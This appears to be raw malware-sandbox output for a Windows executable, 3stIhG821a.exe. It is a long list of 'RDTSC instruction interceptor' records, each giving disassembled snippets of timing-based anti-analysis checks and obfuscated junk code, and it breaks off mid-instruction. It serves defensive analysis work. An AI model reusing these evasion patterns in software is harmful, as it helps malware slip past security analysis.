Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E00D19 second address: E00D37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0E8BCBF73h 0x00000007 pushad 0x00000008 jng 00007FB0E8BCBF66h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E00D37 second address: E00D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E0101C second address: E01035 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB0E8BCBF66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jl 00007FB0E8BCBF66h 0x00000011 pop edx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E01035 second address: E0103B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E0103B second address: E01041 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E01041 second address: E01053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FB0E8BCBD0Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E03F97 second address: E03FBB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jne 00007FB0E8BCBF66h 0x0000000d pop ebx 0x0000000e popad 0x0000000f xor dword ptr [esp], 0202C3E1h 0x00000016 cld 0x00000017 call 00007FB0E8BCBF69h 0x0000001c pushad 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E03FBB second address: E03FFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB0E8BCBD16h 0x00000009 popad 0x0000000a jmp 00007FB0E8BCBD17h 0x0000000f popad 0x00000010 push eax 0x00000011 push ecx 0x00000012 pushad 0x00000013 jmp 00007FB0E8BCBD0Ah 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E03FFD second address: E04029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jne 00007FB0E8BCBF6Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB0E8BCBF73h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E042AC second address: E042B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E04B56 second address: E04B5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E04BA6 second address: E04BD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jne 00007FB0E8BCBD17h 0x0000000b popad 0x0000000c mov dword ptr [esp], ebx 0x0000000f mov esi, dword ptr [ebp+122D39A8h] 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pushad 0x0000001a popad 0x0000001b pop ecx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E04BD3 second address: E04BDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FB0E8BCBF66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E04D7E second address: E04D82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E04D82 second address: E04D86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E04D86 second address: E04D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E04D8C second address: E04DA7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB0E8BCBF6Ch 0x00000008 jg 00007FB0E8BCBF66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push ebx 0x00000012 pushad 0x00000013 jng 00007FB0E8BCBF66h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E05171 second address: E05176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E0708F second address: E070CD instructions: 0x00000000 rdtsc 0x00000002 js 00007FB0E8BCBF66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov di, C806h 0x00000012 push 00000000h 0x00000014 mov esi, dword ptr [ebp+122D39A8h] 0x0000001a push 00000000h 0x0000001c jnc 00007FB0E8BCBF7Dh 0x00000022 xchg eax, ebx 0x00000023 push edi 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E070CD second address: E070D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E07BAD second address: E07BB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E07946 second address: E0794B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E07BB3 second address: E07BB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E0794B second address: E0797C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0E8BCBD0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FB0E8BCBD0Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB0E8BCBD0Fh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E0797C second address: E07980 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E091C2 second address: E091C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E09D8F second address: E09D94 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E09D94 second address: E09DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007FB0E8BCBD08h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 push edx 0x00000023 pop edi 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 mov edi, dword ptr [ebp+122D3A00h] 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushad 0x00000033 popad 0x00000034 jmp 00007FB0E8BCBD12h 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E09DE3 second address: E09DEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E0A869 second address: E0A893 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB0E8BCBD0Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FB0E8BCBD14h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E0A893 second address: E0A898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E0A898 second address: E0A89E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E0CDC6 second address: E0CDCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E0B15E second address: E0B174 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FB0E8BCBD0Bh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E0B174 second address: E0B183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB0E8BCBF66h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E0E40A second address: E0E410 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E0E410 second address: E0E460 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a mov dword ptr [ebp+122D2D92h], edi 0x00000010 movzx eax, ax 0x00000013 popad 0x00000014 push 00000000h 0x00000016 add ebx, dword ptr [ebp+122D1E19h] 0x0000001c mov edi, dword ptr [ebp+122D3C80h] 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push edx 0x00000027 call 00007FB0E8BCBF68h 0x0000002c pop edx 0x0000002d mov dword ptr [esp+04h], edx 0x00000031 add dword ptr [esp+04h], 0000001Dh 0x00000039 inc edx 0x0000003a push edx 0x0000003b ret 0x0000003c pop edx 0x0000003d ret 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 push ebx 0x00000042 pushad 0x00000043 popad 0x00000044 pop ebx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E0E460 second address: E0E466 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E0E466 second address: E0E46A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E0E5BD second address: E0E634 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jo 00007FB0E8BCBD1Dh 0x0000000e jc 00007FB0E8BCBD17h 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007FB0E8BCBD08h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f mov bx, si 0x00000032 mov di, ax 0x00000035 push dword ptr fs:[00000000h] 0x0000003c mov ebx, dword ptr [ebp+124557ACh] 0x00000042 mov dword ptr fs:[00000000h], esp 0x00000049 mov dword ptr [ebp+122D59F1h], edi 0x0000004f mov eax, dword ptr [ebp+122D0049h] 0x00000055 adc edi, 4B1ACDD0h 0x0000005b push FFFFFFFFh 0x0000005d push eax 0x0000005e push esi 0x0000005f pushad 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E0F640 second address: E0F646 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E0E634 second address: E0E63A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E12577 second address: E1257D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E1158B second address: E115B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007FB0E8BCBD11h 0x0000000f jmp 00007FB0E8BCBD0Eh 0x00000014 popad 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E12765 second address: E1276A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E144EF second address: E14506 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0E8BCBD10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E14506 second address: E1459C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB0E8BCBF70h 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007FB0E8BCBF68h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 pushad 0x00000029 call 00007FB0E8BCBF77h 0x0000002e mov edi, dword ptr [ebp+122D1B6Dh] 0x00000034 pop edi 0x00000035 sub edx, 18719987h 0x0000003b popad 0x0000003c push 00000000h 0x0000003e mov dword ptr [ebp+122D1B3Ah], edx 0x00000044 xor dword ptr [ebp+122D2B17h], ebx 0x0000004a push 00000000h 0x0000004c pushad 0x0000004d jmp 00007FB0E8BCBF70h 0x00000052 sub dword ptr [ebp+124598D2h], eax 0x00000058 popad 0x00000059 push eax 0x0000005a jl 00007FB0E8BCBF70h 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E147C7 second address: E147CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E147CD second address: E147D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E19AB0 second address: E19AE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, ebx 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f adc bx, 7366h 0x00000014 xchg eax, esi 0x00000015 jno 00007FB0E8BCBD1Ch 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E19AE7 second address: E19AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E19AEE second address: E19AF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E1AAB6 second address: E1AB29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FB0E8BCBF6Ch 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007FB0E8BCBF68h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 mov ebx, dword ptr [ebp+122D39ACh] 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007FB0E8BCBF68h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 00000015h 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a mov bx, cx 0x0000004d pushad 0x0000004e add ecx, 7ABF18BDh 0x00000054 mov bh, F6h 0x00000056 popad 0x00000057 push 00000000h 0x00000059 or dword ptr [ebp+122D1B28h], eax 0x0000005f xchg eax, esi 0x00000060 push eax 0x00000061 push edx 0x00000062 push esi 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E1AB29 second address: E1AB2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E1AB2E second address: E1AB34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E1674A second address: E1674E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E1674E second address: E16754 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E16754 second address: E16786 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0E8BCBD19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FB0E8BCBD0Ah 0x00000012 ja 00007FB0E8BCBD06h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E19D21 second address: E19D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E16786 second address: E16799 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0E8BCBD0Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E19D25 second address: E19D35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0E8BCBF6Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E16799 second address: E1681F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0E8BCBD19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c or dword ptr [ebp+122D3862h], eax 0x00000012 push dword ptr fs:[00000000h] 0x00000019 pushad 0x0000001a mov edx, edi 0x0000001c pushad 0x0000001d mov dword ptr [ebp+122D2FD2h], ebx 0x00000023 mov dword ptr [ebp+122D21BFh], eax 0x00000029 popad 0x0000002a popad 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 or ebx, 582006D0h 0x00000038 mov dword ptr [ebp+124557ACh], esi 0x0000003e mov eax, dword ptr [ebp+122D0C2Dh] 0x00000044 sub dword ptr [ebp+12458A00h], ebx 0x0000004a push FFFFFFFFh 0x0000004c pushad 0x0000004d or eax, dword ptr [ebp+122D3B18h] 0x00000053 mov edi, dword ptr [ebp+122D3C9Ch] 0x00000059 popad 0x0000005a mov ebx, dword ptr [ebp+122D3C34h] 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007FB0E8BCBD0Fh 0x00000068 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E1CA24 second address: E1CA3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FB0E8BCBF6Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E1CA3E second address: E1CA42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E1CC44 second address: E1CC49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E1CC49 second address: E1CC4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DBCF17 second address: DBCF1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E2601E second address: E26028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB0E8BCBD06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E26028 second address: E2602E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E2602E second address: E26034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E262EB second address: E262F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jp 00007FB0E8BCBF66h 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E262F8 second address: E262FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E262FF second address: E26305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E26305 second address: E26317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FB0E8BCBD0Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E26457 second address: E2648E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0E8BCBF74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop ecx 0x0000000e jmp 00007FB0E8BCBF75h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E3741F second address: E37428 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E37428 second address: E3742E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E3742E second address: E374AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FB0E8BCBD16h 0x0000000d push edi 0x0000000e jmp 00007FB0E8BCBD0Dh 0x00000013 pop edi 0x00000014 popad 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 jl 00007FB0E8BCBD0Eh 0x0000001f mov eax, dword ptr [eax] 0x00000021 pushad 0x00000022 jp 00007FB0E8BCBD14h 0x00000028 jmp 00007FB0E8BCBD0Eh 0x0000002d jp 00007FB0E8BCBD08h 0x00000033 push ebx 0x00000034 pop ebx 0x00000035 popad 0x00000036 mov dword ptr [esp+04h], eax 0x0000003a pushad 0x0000003b pushad 0x0000003c push eax 0x0000003d pop eax 0x0000003e jbe 00007FB0E8BCBD06h 0x00000044 popad 0x00000045 pushad 0x00000046 jmp 00007FB0E8BCBD0Ch 0x0000004b push eax 0x0000004c push 